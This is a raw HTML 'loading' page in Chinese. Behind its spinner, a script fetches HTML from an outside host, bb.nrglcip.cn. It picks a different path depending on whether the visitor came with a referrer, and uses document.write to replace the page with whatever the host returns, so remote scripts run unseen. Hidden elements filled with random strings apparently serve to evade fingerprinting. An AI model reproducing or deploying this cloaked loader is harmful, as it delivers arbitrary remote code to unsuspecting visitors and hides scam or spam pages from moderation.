<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .tXvDn9bi {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .tXvDn9bi .HaaMm1EN {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .tXvDn9bi .content {
            line-height: 50px;
            text-align: center
        }

        .tXvDn9bi .img {
            width: 100%
        }

        .tXvDn9bi .H89BwOHON {
            text-align: center
        }

        .tXvDn9bi .H89BwOHON span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .tXvDn9bi .H89BwOHON span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .tXvDn9bi .H89BwOHON span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .tXvDn9bi .H89BwOHON span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .tXvDn9bi .H89BwOHON span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .tXvDn9bi .H89BwOHON span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .tXvDn9bi .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function CmK5VD0Uq8CxO(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Ohiwu3q = CmK5VD0Uq8CxO('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Ohiwu3q +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Ohiwu3q +".html?a=share";
		}
		
        DsjADnIa=url+"#"+new Date().getTime();
        DsjADnIa && function() {
            $.get(DsjADnIa, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >vrIyb9Wi0dfBBtvZDX93SJxo0NOzu76swqO23Iu7NssDwyGldjJ1nqo3g4mLtdG6nqDitoS9kEtyXbd4clxqNT1qZKBoTRU</b>
<span style='display:none'>SopQZaM3npnO56Pc0SAVsGnW35QmEKFBvFatb9IVOZ9JXBo</span>
<h1 style='display:none' >nPVFvwcYRqinqltbrkM7z5vGkFNJTTszT1N1lYL6LQJkey2SmWb</h1>
<li style='display:none' >KrctPUgaNkFrFyMuchIf8B21SbUOyG2fqNdCMfiOSKctlTGqXx3QrxcFliXK</li>
<ul style='display:none' >k2B4WcJ2lSfCpA</ul>
<div style='display:none'>mfpDenSSIZLkItimSxGM5oXj9QFnaqow3EbhEZOG4eSysKVfHsYCVGI85IA1iu7MTwLOTY00yER0pjJbalwFIKvy1tyqCD</div>
<div style='display:none'>mfpDenSSIZLkItimSxGM5oXj9QFnaqow3EbhEZOG4eSysKVfHsYCVGI85IA1iu7MTwLOTY00yER0pjJbalwFIKvy1tyqCD</div>
<span style='display:none'>SopQZaM3npnO56Pc0SAVsGnW35QmEKFBvFatb9IVOZ9JXBo</span><div class="tXvDn9bi">
    <div class="HaaMm1EN">
        <div class="H89BwOHON">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >QhnNlYq03vcjPrfAukU1YtxX5zzw0dhz61AR7QhLBe1xg6Y2ZD1hbvNKT</li>
<li style='display:none' >QhnNlYq03vcjPrfAukU1YtxX5zzw0dhz61AR7QhLBe1xg6Y2ZD1hbvNKT</li>
<a  href='#' style='display:none'>oQizepT0MIgDVwTj8Ecb9CBzvWSOdyOs1skuT0gyIGfpGiYosCPGhLc4DDdkWor82hzA7ilLq96GbIDmNYLPBC2vQ4EeMoNb</a>
<li style='display:none' >QhnNlYq03vcjPrfAukU1YtxX5zzw0dhz61AR7QhLBe1xg6Y2ZD1hbvNKT</li>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>oQizepT0MIgDVwTj8Ecb9CBzvWSOdyOs1skuT0gyIGfpGiYosCPGhLc4DDdkWor82hzA7ilLq96GbIDmNYLPBC2vQ4EeMoNb</a>
<span style='display:none'>BmiA6szi1IAsSipvOgvKHPAcMX7nqlTnrwpwEAkakjpYJWjkHoT7vBqzUssH1L5FYiPmuUPI1AhVx0VHpOJ3G</span>
<b style='display:none' >F6geCnRi9bzWpdzzAbp3oynTRL1ErEKlFcYoC5ka1</b>
<ul style='display:none' >d4nlNG8sxWlvg5cpcVFY008VFfcIKbQdt5tevTua2BE2Yqf1OH9ygKDhobzSVDo4KtWgmMr</ul></body>
</html>